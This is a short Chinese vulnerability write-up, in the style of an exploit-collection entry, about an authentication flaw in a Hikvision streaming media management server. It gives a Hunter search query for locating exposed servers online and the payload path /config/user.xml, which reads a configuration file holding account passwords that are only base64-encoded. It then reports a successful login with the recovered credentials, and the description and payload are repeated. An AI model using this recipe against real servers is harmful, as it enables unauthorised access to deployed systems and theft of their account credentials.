H11-1海康威视-流媒体管理服务器-InformationLeakage
漏洞描述:
HIKVISION 流媒体管理服务器配置文件未做鉴权,攻击者通过漏洞可以获取网站账号密码
网站图片:
网络测绘:
Hunter 语法:
- hunter:web.body=“流媒体管理服务器”&&web.body=“杭州海康威视系统技术有限公司 版权所有”
漏洞复现:
payload:
/config/user.xml
效果图:
账号密码为base64加密
测试登录,登录成功
HIKVISION 流媒体管理服务器配置文件未做鉴权,攻击者通过漏洞可以获取网站账号密码
payload:
/config/user.xml
效果图:
账号密码为base64加密
测试登录,登录成功